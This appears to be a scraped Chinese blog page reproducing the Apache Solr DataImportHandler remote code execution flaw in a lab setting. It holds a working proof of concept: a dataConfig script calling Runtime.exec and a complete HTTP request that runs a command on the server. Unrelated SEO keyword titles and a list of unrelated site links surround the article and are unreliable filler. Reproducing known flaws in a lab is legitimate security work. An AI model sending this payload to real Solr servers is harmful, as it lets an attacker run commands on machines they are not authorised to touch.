当前位置: 首页 > news >正文

手机备案网站网络营销企业推广策划

手机备案网站,网络营销企业推广策划,怎么得到wordpress文章加图片,html做一个简单的网页Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能&#…

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

访问`http://your-ip:8983/`即可查看到Apache solr的管理页面,无需登录。

1.首先在页面左侧选择`demo`核心,打开Dataimport面板,开启右侧Debug mode,填入以下POC:

<dataConfig><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");}]]></script><document><entity name="sample"fileName=".*"baseDir="/"processor="FileListEntityProcessor"recursive="false"transformer="script:poc" /></document>
</dataConfig>

2.利用burpsuite发送以下请求包:

POST /solr/demo/dataimport?_=1708782956647&indent=on&wt=json HTTP/1.1
Host: your-ip:8983
Content-Length: 613
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-type: application/x-www-form-urlencoded
Origin: http://your-ip:8983
Referer: http://your-ip:8983/solr/
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Connection: closecommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=demo&dataConfig=%3CdataConfig%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22sample%22%0A++++++++++++fileName%3D%22.*%22%0A++++++++++++baseDir%3D%22%2F%22%0A++++++++++++processor%3D%22FileListEntityProcessor%22%0A++++++++++++recursive%3D%22false%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

3.命令成功执行

http://www.yayakq.cn/news/576484/

相关文章:

  • wordpress 根目录函数关键词优化工具
  • 网站建设行业发展趋势织梦做的网站在手机上显示
  • 天津做网站建设的公司百度网盟推广组所拥有的定向功能
  • 深圳建设网站公司排名网络营销专业主修课程
  • 厦门怎么没有 网站备案kaalus wordpress
  • 顺德网站建设服务平台开发和发布网站的主要流程
  • 在阿里巴巴上做网站需要什么条件自己做网站上传视频
  • wap站是什么意思啊无锡网络营销推广
  • 河南 网站备案定制衣服app软件哪个好
  • 建设部网站官网智慧团建登录app
  • 郑州浩方网站建设智联招聘北京大企业公司排名
  • 做外汇都要看什么网站购物网站功能模块
  • 免费做个人网站满屋花网页设计代码
  • 郑州网站制作哪家好网页设计做军事网站的感想
  • 做网站属于技术开发吗做ppt兼职网站
  • 做ppt介绍网站吗网站做线支付平台系统多少钱
  • 百度网站安全检测平台wordpress主题信息
  • 网站网站开发违法吗网站推广计划书怎么写
  • 免费网站推广的方法群晖的网站开发
  • 上海网站建设机构外包加工网是不是骗钱的
  • 字体设计网站大全徐州手机网站
  • 如何建设个人免费网站教程视频二七区室内设计装修公司排名
  • 做网站系统如何保证自己的版权网页特效制作工具
  • 昆明 做网站 vrwordpress文章链接设置
  • 网站编程是什么意思免费微信网站制作
  • 公司建设网站的报告网页设计代码大全模板
  • 简约的网站设计界面wordpress健身预定主题
  • 宿迁网站制作天津网站营销
  • 广州天拓做网站吗wordpress和数据库名
  • 哪种nas可以做网站服务器京润珍珠企业网站优化